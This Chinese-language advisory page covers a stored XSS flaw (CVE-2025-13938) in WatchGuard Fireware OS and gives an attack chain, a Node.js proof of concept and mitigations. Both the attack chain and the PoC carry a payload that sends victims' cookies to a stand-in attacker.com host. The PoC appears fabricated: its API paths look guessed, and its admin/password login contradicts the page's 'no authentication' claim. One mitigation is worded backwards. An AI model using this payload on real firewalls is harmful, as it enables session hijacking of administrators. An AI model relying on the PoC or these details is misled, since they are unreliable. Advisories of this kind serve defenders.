CVE-2025-13938 WatchGuard Fireware OS 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13938

漏洞类型

存储型XSS (Stored Cross-site Scripting)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WatchGuard Fireware OS (Autotask Technology Integration module)

漏洞概述

CVE-2025-13938是WatchGuard Fireware OS中存在的存储型跨站脚本(XSS)漏洞，存在于Autotask Technology Integration模块中。该漏洞允许未经认证的攻击者通过在Web页面生成过程中注入恶意脚本代码，由于是存储型XSS，恶意代码会被永久保存在服务器端，所有访问受影响页面的用户都会受到攻击。CVSS 3.1评分6.1，属于中危级别漏洞。攻击复杂度低，无需特殊权限，但需要用户交互。攻击者可利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或传播恶意软件。由于该漏洞影响WatchGuard防火墙设备的Web管理界面，攻击成功可能导致企业内部网络安全的严重后果。WatchGuard已发布安全公告WGSA-2025-00023，承认此漏洞并提供修复方案。

技术细节

该漏洞属于CWE-79（Improper Neutralization of Input During Web Page Generation）类漏洞，具体为存储型XSS。在WatchGuard Fireware OS的Autotask Technology Integration模块中，用户输入的数据在存储和回显时未进行充分的输入验证和输出编码。攻击者可以通过以下方式利用：1) 在Autotask集成功能的输入字段中注入恶意JavaScript代码；2) 恶意代码被存储在服务器数据库中；3) 当其他用户访问相关页面时，服务器从数据库读取数据并直接嵌入到HTML响应中；4) 浏览器将恶意脚本作为合法页面代码执行。攻击者利用此漏洞可窃取受害者的认证令牌、修改页面内容显示、进行内部网络探测等。由于攻击通过网络发起且不需要认证权限，结合用户交互要求，攻击者通常通过社会工程学手段诱导管理员访问恶意链接或页面。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标WatchGuard防火墙设备版本，确认其运行Fireware OS且版本在受影响范围内（12.4-12.11.4、12.5-12.5.13、2025.1-2025.1.2）

STEP 2

步骤2：定位入口点

访问WatchGuard Fireware OS的Autotask Technology Integration模块，该模块用于与Autotask PSA工具集成

STEP 3

步骤3：构造恶意载荷

构造包含恶意JavaScript代码的XSS payload，如<script>document.location='http://attacker.com/steal?c='+document.cookie</script>

STEP 4

步骤4：注入存储

将恶意payload提交到Autotask集成模块的输入字段（如公司名称、联系人信息等），数据被存储到服务器数据库

STEP 5

步骤5：诱导受害者

通过社会工程学手段诱导管理员或其他用户访问包含恶意脚本的页面

STEP 6

步骤6：脚本执行

当受害者访问受影响页面时，服务器从数据库读取恶意数据并嵌入HTML响应，浏览器执行恶意JavaScript代码

STEP 7

步骤7：窃取敏感信息

恶意脚本将受害者的Cookie、会话令牌等敏感信息发送到攻击者控制的服务器

STEP 8

步骤8：账户劫持

攻击者利用窃取的凭证接管受害者账户，进一步渗透内网或修改防火墙配置

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-13938 WatchGuard Fireware OS Stored XSS PoC
// Target: WatchGuard Fireware OS Autotask Integration Module
// Note: This is for authorized security testing only

const axios = require('axios');

async function exploitCVE202513938() {
  const targetUrl = 'https://target-firewall.local:8080';
  const maliciousPayload = '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>';
  
  // Step 1: Authenticate to WatchGuard Fireware OS
  const authData = {
    username: 'admin',
    password: 'password'
  };
  
  try {
    const loginResponse = await axios.post(`${targetUrl}/api/login`, authData, {
      headers: {
        'Content-Type': 'application/json',
        'X-Auth-Token': 'valid-token-if-needed'
      }
    });
    
    const sessionCookie = loginResponse.headers['set-cookie'];
    
    // Step 2: Inject XSS payload into Autotask Integration module
    const autotaskConfig = {
      endpoint: 'autotask_integration',
      field: 'company_name',  // or other input fields in Autotask module
      value: maliciousPayload
    };
    
    await axios.post(`${targetUrl}/api/autotask/config`, autotaskConfig, {
      headers: {
        'Cookie': sessionCookie,
        'Content-Type': 'application/json'
      }
    });
    
    console.log('[+] XSS payload injected successfully');
    console.log('[+] Payload will be stored and executed when viewed');
    
  } catch (error) {
    console.error('[-] Exploitation failed:', error.message);
  }
}

exploitCVE202513938();

影响范围

WatchGuard Fireware OS 12.4 至 12.11.4

WatchGuard Fireware OS 12.5 至 12.5.13

WatchGuard Fireware OS 2025.1 至 2025.1.2

防御指南

临时缓解措施

立即将WatchGuard Fireware OS升级到厂商发布的安全更新版本。在等待补丁期间，可采取以下临时缓解措施：1) 禁用不必要的Autotask Technology Integration功能；2) 限制管理界面的访问IP范围，仅允许受信任的管理员IP访问；3) 启用强制的HTTPS访问并配置安全的Cookie属性（HttpOnly、Secure标志）；4) 提醒管理员不要点击可疑链接或访问非官方页面；5) 在边界防火墙上下架XSS攻击特征规则；6) 启用WatchGuard设备的日志审计功能以便及时发现异常行为。